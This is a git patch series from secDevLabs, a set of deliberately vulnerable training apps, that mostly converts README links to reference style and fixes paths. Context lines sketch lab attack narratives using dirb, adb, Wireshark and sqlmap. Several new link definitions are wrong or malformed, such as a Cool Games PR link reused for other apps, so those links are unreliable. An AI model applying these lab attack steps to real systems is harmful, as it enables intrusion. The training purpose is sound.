From cfc1b0afa48a00f6b3a676345b872a2350d4dc7b Mon Sep 17 00:00:00 2001 From: FabioHCNobre Date: Tue, 11 Oct 2022 18:22:21 -0300 Subject: [PATCH 01/31] Update CONTRIBUTING.md Links fix-mitigation PR's #588 --- docs/CONTRIBUTING.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/docs/CONTRIBUTING.md b/docs/CONTRIBUTING.md index 3af595cc1..ef8164634 100644 --- a/docs/CONTRIBUTING.md +++ b/docs/CONTRIBUTING.md @@ -53,7 +53,7 @@ To build some of the secDevLabs apps, some third party code, such as libraries o [1]:/docs/Makefile [3]:/docs/README_Template.md -[4]:/docs/PR_Template.md -[5]:/docs/Issue_Template.md +[4]:https://github.com/globocom/secDevLabs/pulls +[5]:https://github.com/globocom/secDevLabs/issues [6]:https://docs.docker.com/compose/gettingstarted/ [7]:https://docs.docker.com/compose/compose-file/ From 399c2acc257445a342cc3c4ec01e3a2a78832f19 Mon Sep 17 00:00:00 2001 From: FabioHCNobre Date: Thu, 13 Oct 2022 17:44:33 -0300 Subject: [PATCH 02/31] Update README_Template.md --- docs/README_Template.md | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/docs/README_Template.md b/docs/README_Template.md index 242ac3d35..a7e219dcc 100644 --- a/docs/README_Template.md +++ b/docs/README_Template.md @@ -5,7 +5,7 @@ ( Be sure to add a banner image of your app here! )

- +

( Here's a short description of your app! ) @@ -71,19 +71,19 @@ First time acessing the app: Found an interesting page:

- +

Started the analysis on how the app handles cookies:

- +

Confirmed the suspicion by having a look at the code!

- +

Add as many images as you can! A picture is worth more than a thousand words! @@ -104,13 +104,13 @@ Some good examples of images are as follows: Creating a payload:

- +

Delivering a payload, and results!

- +

## Secure this app From a82050f483a16a60ef3e72e2c6c9b58105f32aa2 Mon Sep 17 00:00:00 2001 From: FabioHCNobre Date: Thu, 13 Oct 2022 17:45:58 -0300 Subject: [PATCH 03/31] Update README_Template.md --- docs/README_Template.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/docs/README_Template.md b/docs/README_Template.md index a7e219dcc..8223c0d3f 100644 --- a/docs/README_Template.md +++ b/docs/README_Template.md @@ -65,7 +65,7 @@ A nice example of images to have on an attack narrative in the discovery section First time acessing the app:

- +

Found an interesting page: From 5b6b5543a5307a0f769f033c00cc9b84dfa2d59d Mon Sep 17 00:00:00 2001 From: FabioHCNobre Date: Thu, 13 Oct 2022 17:48:02 -0300 Subject: [PATCH 04/31] Update README_Template.md --- docs/README_Template.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/docs/README_Template.md b/docs/README_Template.md index 8223c0d3f..6f4b69b35 100644 --- a/docs/README_Template.md +++ b/docs/README_Template.md @@ -127,7 +127,7 @@ How would you migitate this vulnerability? After your changes, an attacker shoul ## Contributing -We encourage you to contribute to SecDevLabs! Please check out the [Contributing to SecDevLabs](../../../docs/CONTRIBUTING.md) section for guidelines on how to proceed! 🎉 +We encourage you to contribute to SecDevLabs! Please check out the [Contributing to SecDevLabs](../docs/CONTRIBUTING.md) section for guidelines on how to proceed! 🎉 [secDevLabs]: https://github.com/globocom/secDevLabs [ExploitDB]: https://www.exploit-db.com/ From 90501488015665e739b160044c47db0748b31fad Mon Sep 17 00:00:00 2001 From: FabioHCNobre Date: Thu, 13 Oct 2022 17:50:48 -0300 Subject: [PATCH 05/31] Update Dirb.md --- docs/Dirb.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/docs/Dirb.md b/docs/Dirb.md index fc7910c28..35006a087 100644 --- a/docs/Dirb.md +++ b/docs/Dirb.md @@ -48,7 +48,7 @@ dirb http://localhost:5000 ./docs/common.txt ```
- +
Fig.1 - Dirb demonstration
From 31d7e88f0e986fde86e0b412d17fe495840ea12a Mon Sep 17 00:00:00 2001 From: FabioHCNobre Date: Thu, 13 Oct 2022 17:52:44 -0300 Subject: [PATCH 06/31] Update Dirb.md --- docs/Dirb.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/docs/Dirb.md b/docs/Dirb.md index 35006a087..4690475bb 100644 --- a/docs/Dirb.md +++ b/docs/Dirb.md @@ -48,7 +48,7 @@ dirb http://localhost:5000 ./docs/common.txt ```
- +
Fig.1 - Dirb demonstration
From a1eae562c344a8052f5cad7d982d79c2b7ac98aa Mon Sep 17 00:00:00 2001 From: FabioHCNobre Date: Wed, 19 Oct 2022 20:52:51 -0300 Subject: [PATCH 07/31] Update README.md --- owasp-top10-2016-mobile/m2/cool_games/README.md | 10 +++++++--- 1 file changed, 7 insertions(+), 3 deletions(-) diff --git a/owasp-top10-2016-mobile/m2/cool_games/README.md b/owasp-top10-2016-mobile/m2/cool_games/README.md index 812ab1316..a86d58707 100644 --- a/owasp-top10-2016-mobile/m2/cool_games/README.md +++ b/owasp-top10-2016-mobile/m2/cool_games/README.md @@ -4,7 +4,7 @@

-Cool Games is a Flutter powered mobile app that serves as the mobile version of [GamesIRADOS.com](https://github.com/globocom/secDevLabs/tree/master/owasp-top10-2017-apps/a10/games-irados). It is built with a mobile front-end and a Golang powered back-end. +Cool Games is a Flutter powered mobile app that serves as the mobile version of [GamesIRADOS.com][GamesIRADOScom]. It is built with a mobile front-end and a Golang powered back-end. ## Index @@ -25,7 +25,7 @@ The main goal of this app is to discuss how **Insecure Data Storage** vulnerabil Before we start, it's important to mention that this app's code is divided into two parts: a back-end server, which can be found in the `server` folder, and the mobile app's code itself in the `mobile` folder. In order for the app to run as intended, the back-end server must be up and running, but no need to worry, we'll walk you through it! 😁 -To start this intentionally **insecure application**, you will need [Flutter][VS-Code-Flutter], [Docker][Docker Install] and [Docker Compose][Docker Compose Install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you'll need to start the server, which can be done through the commands: +To start this intentionally **insecure application**, you will need [Flutter][VS-Code-Flutter], [Docker][Docker Install] and [Docker Compose][Docker Compose Install]. After forking [secDevLabs][secDevLabs], you'll need to start the server, which can be done through the commands: ### Start server commands: @@ -178,14 +178,18 @@ How would you mitigate this vulnerability? After your changes, an attacker shoul ## PR solutions -[Spoiler alert 🚨] To understand how this vulnerability can be mitigated, check out [these pull requests](https://github.com/globocom/secDevLabs/pulls?q=is%3Apr+is%3Aclosed+label%3AM2-OWASP-2016+label%3A%22Cool+Games%22)! +[Spoiler alert 🚨] To understand how this vulnerability can be mitigated, check out [these pull requests][these pull requests]! ## Contributing We encourage you to contribute to SecDevLabs! Please check out the [Contributing to SecDevLabs](../../../docs/CONTRIBUTING.md) section for guidelines on how to proceed! 🎉 + +[GamesIRADOScom] : https://github.com/globocom/secDevLabs/tree/master/owasp-top10-2021-apps/a9/games-irados +[secDevLabs] : https://github.com/globocom/secDevLabs [API-Version-Issue]: https://github.com/globocom/secDevLabs/blob/master/docs/api-version-issue.md [Flutter]: https://flutter.dev/docs/get-started/install [VS-Code-Flutter]: https://github.com/globocom/secDevLabs/blob/master/docs/installing-flutter.md [Docker Install]: https://docs.docker.com/install/ [Docker Compose Install]: https://docs.docker.com/compose/install/ +[these pull requests]:https://github.com/globocom/secDevLabs/pulls?q=is%3Apr+is%3Aclosed+label%3AM2-OWASP-2016+label%3A%22Cool+Games%22 \ No newline at end of file From fdab03babdf9d08a6b4000a91f3fefc272f14776 Mon Sep 17 00:00:00 2001 From: FabioHCNobre Date: Wed, 19 Oct 2022 20:54:56 -0300 Subject: [PATCH 08/31] Update README.md --- owasp-top10-2016-mobile/m2/cool_games/README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/owasp-top10-2016-mobile/m2/cool_games/README.md b/owasp-top10-2016-mobile/m2/cool_games/README.md index a86d58707..132be294a 100644 --- a/owasp-top10-2016-mobile/m2/cool_games/README.md +++ b/owasp-top10-2016-mobile/m2/cool_games/README.md @@ -185,8 +185,8 @@ How would you mitigate this vulnerability? After your changes, an attacker shoul We encourage you to contribute to SecDevLabs! Please check out the [Contributing to SecDevLabs](../../../docs/CONTRIBUTING.md) section for guidelines on how to proceed! 🎉 -[GamesIRADOScom] : https://github.com/globocom/secDevLabs/tree/master/owasp-top10-2021-apps/a9/games-irados -[secDevLabs] : https://github.com/globocom/secDevLabs +[GamesIRADOS.com]: https://github.com/globocom/secDevLabs/tree/master/owasp-top10-2021-apps/a9/games-irados +[secDevLabs]: https://github.com/globocom/secDevLabs [API-Version-Issue]: https://github.com/globocom/secDevLabs/blob/master/docs/api-version-issue.md [Flutter]: https://flutter.dev/docs/get-started/install [VS-Code-Flutter]: https://github.com/globocom/secDevLabs/blob/master/docs/installing-flutter.md From a59074ed117cac7ec2148aab7d02a155a8541333 Mon Sep 17 00:00:00 2001 From: FabioHCNobre Date: Wed, 19 Oct 2022 20:57:17 -0300 Subject: [PATCH 09/31] Update README.md --- owasp-top10-2016-mobile/m2/cool_games/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/owasp-top10-2016-mobile/m2/cool_games/README.md b/owasp-top10-2016-mobile/m2/cool_games/README.md index 132be294a..a7950f42d 100644 --- a/owasp-top10-2016-mobile/m2/cool_games/README.md +++ b/owasp-top10-2016-mobile/m2/cool_games/README.md @@ -185,7 +185,7 @@ How would you mitigate this vulnerability? After your changes, an attacker shoul We encourage you to contribute to SecDevLabs! Please check out the [Contributing to SecDevLabs](../../../docs/CONTRIBUTING.md) section for guidelines on how to proceed! 🎉 -[GamesIRADOS.com]: https://github.com/globocom/secDevLabs/tree/master/owasp-top10-2021-apps/a9/games-irados +[GamesIRADOScom]: https://github.com/globocom/secDevLabs/tree/master/owasp-top10-2021-apps/a9/games-irados [secDevLabs]: https://github.com/globocom/secDevLabs [API-Version-Issue]: https://github.com/globocom/secDevLabs/blob/master/docs/api-version-issue.md [Flutter]: https://flutter.dev/docs/get-started/install From 990a45b985a4637f424ca2c874abd5e99bd4b54b Mon Sep 17 00:00:00 2001 From: FabioHCNobre Date: Wed, 19 Oct 2022 20:58:23 -0300 Subject: [PATCH 10/31] Update README.md --- owasp-top10-2016-mobile/m4/note-box/README.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/owasp-top10-2016-mobile/m4/note-box/README.md b/owasp-top10-2016-mobile/m4/note-box/README.md index 545dc9f86..8408cdee5 100644 --- a/owasp-top10-2016-mobile/m4/note-box/README.md +++ b/owasp-top10-2016-mobile/m4/note-box/README.md @@ -126,7 +126,7 @@ How would you mitigate this vulnerability? After your changes, an attacker shoul ## PR solutions -[Spoiler alert 🚨] To understand how this vulnerability can be mitigated, check out [these pull requests](https://github.com/globocom/secDevLabs/pulls?q=is%3Apr+is%3Aclosed+label%3AM4-OWASP-2016+label%3A%22mitigation+solution+%F0%9F%94%92%22)! +[Spoiler alert 🚨] To understand how this vulnerability can be mitigated, check out [these pull requests][these pull requests]! ## Contributing @@ -136,3 +136,4 @@ We encourage you to contribute to SecDevLabs! Please check out the [Contributing [VS-Code-Flutter]: ../../../docs/installing-flutter.md [Docker Install]: https://docs.docker.com/install/ [Docker Compose Install]: https://docs.docker.com/compose/install/ +[these pull requests]:https://github.com/globocom/secDevLabs/pulls?q=is%3Apr+is%3Aclosed+label%3AM2-OWASP-2016+label%3A%22Cool+Games%22 \ No newline at end of file From d084ccb6502551e6ec86fc27f90bc6947f3977ec Mon Sep 17 00:00:00 2001 From: FabioHCNobre Date: Wed, 19 Oct 2022 20:59:36 -0300 Subject: [PATCH 11/31] Update README.md --- owasp-top10-2016-mobile/m4/note-box/README.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/owasp-top10-2016-mobile/m4/note-box/README.md b/owasp-top10-2016-mobile/m4/note-box/README.md index 8408cdee5..2f5d7a3f1 100644 --- a/owasp-top10-2016-mobile/m4/note-box/README.md +++ b/owasp-top10-2016-mobile/m4/note-box/README.md @@ -25,7 +25,7 @@ The main goal of this app is to discuss how **Insecure Authentication** vulnerab Before we start, it's important to mention that this app's code is divided into two parts: a back-end server, which can be found in the `server` folder, and the mobile app's code itself in the `mobile` folder. In order for the app to run as intended, the back-end server must be up and running, but no need to worry, we'll walk you through it! 😁 -To start this intentionally **insecure application**, you will need [Flutter][VS-Code-Flutter], [Docker][Docker Install] and [Docker Compose][Docker Compose Install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you'll need to start the server, which can be done through the commands: +To start this intentionally **insecure application**, you will need [Flutter][VS-Code-Flutter], [Docker][Docker Install] and [Docker Compose][Docker Compose Install]. After forking [secDevLabs][secDevLabs], you'll need to start the server, which can be done through the commands: ### Start server commands: @@ -132,6 +132,7 @@ How would you mitigate this vulnerability? After your changes, an attacker shoul We encourage you to contribute to SecDevLabs! Please check out the [Contributing to SecDevLabs](../../../docs/CONTRIBUTING.md) section for guidelines on how to proceed! 🎉 +[secDevLabs]: (https://github.com/globocom/secDevLabs) [Flutter]: https://flutter.dev/docs/get-started/install [VS-Code-Flutter]: ../../../docs/installing-flutter.md [Docker Install]: https://docs.docker.com/install/ From 5f8ee75b83c16270d32efe37c7f987605c99145f Mon Sep 17 00:00:00 2001 From: FabioHCNobre Date: Wed, 19 Oct 2022 21:04:50 -0300 Subject: [PATCH 12/31] Update README.md --- owasp-top10-2016-mobile/m5/panda_zap/README.md | 15 ++++++++++----- 1 file changed, 10 insertions(+), 5 deletions(-) diff --git a/owasp-top10-2016-mobile/m5/panda_zap/README.md b/owasp-top10-2016-mobile/m5/panda_zap/README.md index 25043cb96..8fdd40ace 100644 --- a/owasp-top10-2016-mobile/m5/panda_zap/README.md +++ b/owasp-top10-2016-mobile/m5/panda_zap/README.md @@ -25,7 +25,7 @@ The main goal of this app is to discuss how **Insufficient Cryptography** vulner Before we start, it's important to mention that this app's code is divided into two parts: a back-end server, which can be found in the `server` folder, and the mobile app's code itself in the `mobile` folder. In order for the app to run as intended, the back-end server must be up and running, but no need to worry, we'll walk you through it! 😁 -To start this intentionally **insecure application**, you will need [Flutter][VS-Code-Flutter], [Docker][Docker Install] and [Docker Compose][Docker Compose Install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you'll need to start the server, which can be done through the commands: +To start this intentionally **insecure application**, you will need [Flutter][VS-Code-Flutter], [Docker][Docker Install] and [Docker Compose][Docker Compose Install]. After forking [secDevLabs][secDevLabs], you'll need to start the server, which can be done through the commands: ### Start server commands: @@ -107,7 +107,7 @@ To enter the conversation, click the message bubble. After that, it's possible t ### 🔥 -If an attacker came into possession of the device and used the [Android Debug Bridge](https://developer.android.com/studio/command-line/adb) tool to communicate with it through a Unix shell, he could inspect how the app behaves and what it logs. +If an attacker came into possession of the device and used the [Android Debug Bridge][Android Debug Bridge] tool to communicate with it through a Unix shell, he could inspect how the app behaves and what it logs. To begin, it is possible to list connected devices with the following command: @@ -167,11 +167,11 @@ Having access to the app's log, it's possible to see that a certain key seems to

-Now in possession of the key and by having a look at the app's code, it's possible to see that a [Caesar Cipher](https://en.wikipedia.org/wiki/Caesar_cipher) encryption mechanism is being used. +Now in possession of the key and by having a look at the app's code, it's possible to see that a [Caesar Cipher][Caesar Cipher] encryption mechanism is being used. In cryptography, a Caesar cipher is an encryption technique in which each letter is shifted by a fixed number of positions down the alphabet. Even though we appear to have what seems to be the shift value, logged as being the `key`, due to the fact of limited letters in the alphabet (25 in English), the cipher can easily be broken in a brute force attack. -If an attacker were connected to the same network as someone using the app, it would be possible to capture and inspect the packets being transmitted using [Wireshark](https://www.wireshark.org/). To better narrow our search, we can filter for the port the app seems to be using, `11005`, as shown by the image below: +If an attacker were connected to the same network as someone using the app, it would be possible to capture and inspect the packets being transmitted using [Wireshark][Wireshark]. To better narrow our search, we can filter for the port the app seems to be using, `11005`, as shown by the image below:

@@ -198,7 +198,7 @@ How would you mitigate this vulnerability? After your changes, the app should no ## PR solutions -[Spoiler alert 🚨] To understand how this vulnerability can be mitigated, check out [these pull requests](https://github.com/globocom/secDevLabs/pulls?q=is%3Apr+is%3Aclosed+label%3A%22Panda+Zap%22+label%3AM5-OWASP-2016+label%3A%22mitigation+solution+%F0%9F%94%92%22)! +[Spoiler alert 🚨] To understand how this vulnerability can be mitigated, check out [these pull requests][these pull requests]! ## Contributing @@ -209,3 +209,8 @@ We encourage you to contribute to SecDevLabs! Please check out the [Contributing [VS-Code-Flutter]: https://github.com/globocom/secDevLabs/blob/master/docs/installing-flutter.md [Docker Install]: https://docs.docker.com/install/ [Docker Compose Install]: https://docs.docker.com/compose/install/ +[these pull requests]:https://github.com/globocom/secDevLabs/pulls?q=is%3Apr+is%3Aclosed+label%3AM2-OWASP-2016+label%3A%22Cool+Games%22 +[secDevLabs]: (https://github.com/globocom/secDevLabs) +[Android Debug Bridge]: https://developer.android.com/studio/command-line/adb +[Caesar Cipher]: https://en.wikipedia.org/wiki/Caesar_cipher +[Wireshark]: https://www.wireshark.org/) \ No newline at end of file From 63dd49e0ed93a5afe845c67d663fc4bbbe25ff24 Mon Sep 17 00:00:00 2001 From: FabioHCNobre Date: Wed, 19 Oct 2022 21:06:03 -0300 Subject: [PATCH 13/31] Update README.md --- owasp-top10-2021-apps/a1/camplake-api/README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/owasp-top10-2021-apps/a1/camplake-api/README.md b/owasp-top10-2021-apps/a1/camplake-api/README.md index 5349ae5b8..a7ba37b58 100644 --- a/owasp-top10-2021-apps/a1/camplake-api/README.md +++ b/owasp-top10-2021-apps/a1/camplake-api/README.md @@ -25,7 +25,7 @@ The main goal of this app is to discuss how **Broken Access Control** vulnerabil ## Setup -To start this intentionally **insecure application**, you will need [Docker][Docker Install] and [Docker Compose][Docker Compose Install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start: +To start this intentionally **insecure application**, you will need [Docker][Docker Install] and [Docker Compose][Docker Compose Install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start: ```sh cd secDevLabs/owasp-top10-2021-apps/a1/camp-lake-api @@ -123,4 +123,4 @@ We encourage you to contribute to SecDevLabs! Please check out the [Contributing [Docker Compose Install]: https://docs.docker.com/compose/install/ [App]: http://localhost:10005 [secDevLabs]: https://github.com/globocom/secDevLabs -[2]:https://github.com/globocom/secDevLabs/tree/master/owasp-top10-2017-apps/a5/ecommerce-api \ No newline at end of file +[2]:https://github.com/globocom/secDevLabs/tree/master/owasp-top10-2017-apps/a5/ecommerce-api From b8021d6369301e201a1825396050c1e9207491be Mon Sep 17 00:00:00 2001 From: FabioHCNobre Date: Wed, 19 Oct 2022 21:07:50 -0300 Subject: [PATCH 14/31] Update README.md --- owasp-top10-2021-apps/a1/ecommerce-api/README.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/owasp-top10-2021-apps/a1/ecommerce-api/README.md b/owasp-top10-2021-apps/a1/ecommerce-api/README.md index 76fc0655b..290b4ffce 100644 --- a/owasp-top10-2021-apps/a1/ecommerce-api/README.md +++ b/owasp-top10-2021-apps/a1/ecommerce-api/README.md @@ -23,7 +23,7 @@ The main goal of this app is to discuss how **Broken Access Control** vulnerabil ## Setup -To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start: +To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start: ```sh cd secDevLabs/owasp-top10-2021-apps/a1/ecommerce-api @@ -120,3 +120,4 @@ We encourage you to contribute to SecDevLabs! Please check out the [Contributing [app]: http://localhost:10005 [secdevlabs]: https://github.com/globocom/secDevLabs [2]: https://github.com/globocom/secDevLabs/tree/master/owasp-top10-2017-apps/a5/ecommerce-api +[secDevLabs]: https://github.com/globocom/secDevLabs \ No newline at end of file From 38cdbdad31bee0053143455b39e2dc7896721eda Mon Sep 17 00:00:00 2001 From: FabioHCNobre Date: Wed, 19 Oct 2022 21:08:57 -0300 Subject: [PATCH 15/31] Update README.md --- owasp-top10-2021-apps/a1/tictactoe/README.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/owasp-top10-2021-apps/a1/tictactoe/README.md b/owasp-top10-2021-apps/a1/tictactoe/README.md index a47df86cc..1c438363d 100644 --- a/owasp-top10-2021-apps/a1/tictactoe/README.md +++ b/owasp-top10-2021-apps/a1/tictactoe/README.md @@ -21,7 +21,7 @@ The main goal of this app is to discuss how **Broken Access Control** vulnerabil ## Setup -To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start: +To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start: ```sh @@ -207,4 +207,5 @@ We encourage you to contribute to SecDevLabs! Please check out the [Contributing [docker compose install]: https://docs.docker.com/compose/install/ [app]: http://localhost.:10005 [secdevlabs]: https://github.com/globocom/secDevLabs +[secDevLabs]: https://github.com/globocom/secDevLabs [2]: https://github.com/globocom/secDevLabs/tree/master/owasp-top10-2021-apps/a1/tictactoe From ce4243bfb12ac9ead1df9f3a714349485ac7c817 Mon Sep 17 00:00:00 2001 From: FabioHCNobre Date: Wed, 19 Oct 2022 21:10:57 -0300 Subject: [PATCH 16/31] Update README.md --- owasp-top10-2021-apps/a2/snake-pro/README.md | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/owasp-top10-2021-apps/a2/snake-pro/README.md b/owasp-top10-2021-apps/a2/snake-pro/README.md index 7522e0344..8b3693212 100644 --- a/owasp-top10-2021-apps/a2/snake-pro/README.md +++ b/owasp-top10-2021-apps/a2/snake-pro/README.md @@ -23,7 +23,7 @@ The main goal of this app is to discuss how **Cryptographic Failure** vulnerabil ## Setup -To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start: +To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start: ```sh cd secDevLabs/owasp-top10-2021-apps/a2/snake-pro @@ -68,7 +68,7 @@ Additionally, the channel is being used by users to send their sensitive data is ### 🔥 -If the database is somehow exposed, all users' passwords will be leaked, as shown on these MongoDB documents. To view them, you can locally install [Robo 3T](https://robomongo.org/download) and use default credentials used in `config.yml`: +If the database is somehow exposed, all users' passwords will be leaked, as shown on these MongoDB documents. To view them, you can locally install [Robo 3T][Robo 3T] and use default credentials used in `config.yml`: ``` Database: snake_pro @@ -118,3 +118,6 @@ We encourage you to contribute to SecDevLabs! Please check out the [Contributing [docker compose install]: https://docs.docker.com/compose/install/ [app]: http://localhost:10003 [dirb]: https://tools.kali.org/web-applications/dirb +[Robo 3T]: https://robomongo.org/download +[secDevLabs]: https://github.com/globocom/secDevLabs + From e527b29066fda4f20ce4a5070e8697fa2d58dec2 Mon Sep 17 00:00:00 2001 From: FabioHCNobre Date: Wed, 19 Oct 2022 21:14:12 -0300 Subject: [PATCH 17/31] Update README.md --- owasp-top10-2021-apps/a3/comment-killer/README.md | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/owasp-top10-2021-apps/a3/comment-killer/README.md b/owasp-top10-2021-apps/a3/comment-killer/README.md index 3db118056..5b48d6108 100644 --- a/owasp-top10-2021-apps/a3/comment-killer/README.md +++ b/owasp-top10-2021-apps/a3/comment-killer/README.md @@ -27,7 +27,7 @@ The main goal of this app is to discuss how **Cross-Site Scripting** vulnerabili ## Setup -To start this intentionally **insecure application**, you will need [Docker](https://docs.docker.com/get-docker/) and [Docker Compose](https://docs.docker.com/compose/install/). After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start: +To start this intentionally **insecure application**, you will need [Docker][Docker] and [Docker Compose][Docker Compose]. After forking [secDevLabs][secDevLabs], you must type the following commands to start: ```bash cd secDevLabs/owasp-top10-2021-apps/a3/comment-killer @@ -96,7 +96,7 @@ func handler(c echo.Context) error { } ``` -In order to start the API, the following command can be used (you should check this [guide](https://golang.org/doc/install) if you need any help with Golang): +In order to start the API, the following command can be used (you should check this [guide][guide] if you need any help with Golang): ```sh go run main.go @@ -157,3 +157,7 @@ We encourage you to contribute to SecDevLabs! Please check out the [Contributing [docker install]: https://docs.docker.com/install/ [docker compose install]: https://docs.docker.com/compose/install/ [app]: http://localhost:10007 +[Docker]: https://docs.docker.com/get-docker/ +[Docker Compose]: https://docs.docker.com/compose/install/ +[guide]: https://golang.org/doc/install +[secDevLabs]: https://github.com/globocom/secDevLabs From 74baa26a0627054fcedac0cb159c13fbd06c781c Mon Sep 17 00:00:00 2001 From: FabioHCNobre Date: Wed, 19 Oct 2022 21:16:32 -0300 Subject: [PATCH 18/31] Update README.md --- owasp-top10-2021-apps/a3/copy-n-paste/README.md | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/owasp-top10-2021-apps/a3/copy-n-paste/README.md b/owasp-top10-2021-apps/a3/copy-n-paste/README.md index 6ef40a6bb..b16f9741b 100644 --- a/owasp-top10-2021-apps/a3/copy-n-paste/README.md +++ b/owasp-top10-2021-apps/a3/copy-n-paste/README.md @@ -21,7 +21,7 @@ The main goal of this project is to discuss how **SQL Injection** vulnerabilitie ## Setup -To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start: +To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start: ```sh cd secDevLabs/owasp-top10-2021-apps/a3/copy-n-paste @@ -106,7 +106,7 @@ Request: #### 🔥 -An attacker could now create any malicious SQL queries and send them to the API that, in theory, would be executed. For this attack narrative, [sqlmap](https://github.com/sqlmapproject/sqlmap) will be used to exemplify how an automated SQL Injection attack may be performed. +An attacker could now create any malicious SQL queries and send them to the API that, in theory, would be executed. For this attack narrative, [sqlmap][sqlmap] will be used to exemplify how an automated SQL Injection attack may be performed. To install sqlmap on a Mac you can simply type: @@ -169,6 +169,9 @@ How could you now mitigate this vulnerability? After your code modification, an We encourage you to contribute to SecDevLabs! Please check out the [Contributing to SecDevLabs](../../../docs/CONTRIBUTING.md) section for guidelines on how to proceed! 🎉 + +[secDevLabs]: https://github.com/globocom/secDevLabs [docker install]: https://docs.docker.com/install/ [docker compose install]: https://docs.docker.com/compose/install/ [app]: http://localhost:10001 +[sqlmap]: https://github.com/sqlmapproject/sqlmap \ No newline at end of file From 8d0896c00bd8d9a7521cfdf175bcee996fb51d3f Mon Sep 17 00:00:00 2001 From: FabioHCNobre Date: Wed, 19 Oct 2022 21:17:59 -0300 Subject: [PATCH 19/31] Update README.md --- owasp-top10-2021-apps/a3/gossip-world/README.md | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/owasp-top10-2021-apps/a3/gossip-world/README.md b/owasp-top10-2021-apps/a3/gossip-world/README.md index b913a717e..8fb154726 100644 --- a/owasp-top10-2021-apps/a3/gossip-world/README.md +++ b/owasp-top10-2021-apps/a3/gossip-world/README.md @@ -23,7 +23,7 @@ The main goal of this app is to discuss how **Cross-Site Scripting** vulnerabili ## Setup -To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start: +To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start: ```sh cd secDevLabs/owasp-top10-2021-apps/a3/gossip-world @@ -99,7 +99,7 @@ func handler(c echo.Context) error { } ``` -To run this code simply type the following command in your terminal (you should check this [guide](https://golang.org/doc/install) if you need any help with Golang): +To run this code simply type the following command in your terminal (you should check this [guide][guide] if you need any help with Golang): ```sh go run main.go @@ -145,6 +145,8 @@ How would you mitigate this vulnerability? After your changes, an attacker shoul We encourage you to contribute to SecDevLabs! Please check out the [Contributing to SecDevLabs](../../../docs/CONTRIBUTING.md) section for guidelines on how to proceed! 🎉 +[guide]: https://golang.org/doc/install [docker install]: https://docs.docker.com/install/ [docker compose install]: https://docs.docker.com/compose/install/ [app]: http://localhost:10007 +[guide]: https://golang.org/doc/install From 2b4d5526ddbd1aa09e004e9620accc9994fcee28 Mon Sep 17 00:00:00 2001 From: FabioHCNobre Date: Wed, 19 Oct 2022 21:19:58 -0300 Subject: [PATCH 20/31] Update README.md --- owasp-top10-2021-apps/a3/mongection/README.md | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/owasp-top10-2021-apps/a3/mongection/README.md b/owasp-top10-2021-apps/a3/mongection/README.md index 86151cb6e..2e24b7bb3 100644 --- a/owasp-top10-2021-apps/a3/mongection/README.md +++ b/owasp-top10-2021-apps/a3/mongection/README.md @@ -21,7 +21,7 @@ The main goal of this project is to discuss how **NoSQL Injection** vulnerabilit ## Setup -To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start: +To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start: ```sh cd secDevLabs/owasp-top10-2021-apps/a3/mongection @@ -62,7 +62,7 @@ Now that you know the purpose of this app, what could go wrong? The following se #### Lack of input validation allows injection of NoSQL queries -After reviewing [db.js](https://github.com/globocom/secDevLabs/blob/master/owasp-top10-2021-apps/a3/mongection/src/db.js) file, it was possible to see that some input from users is concatenated with NoSQL queries, as shown in the following code snippets: +After reviewing [db.js][db.js] 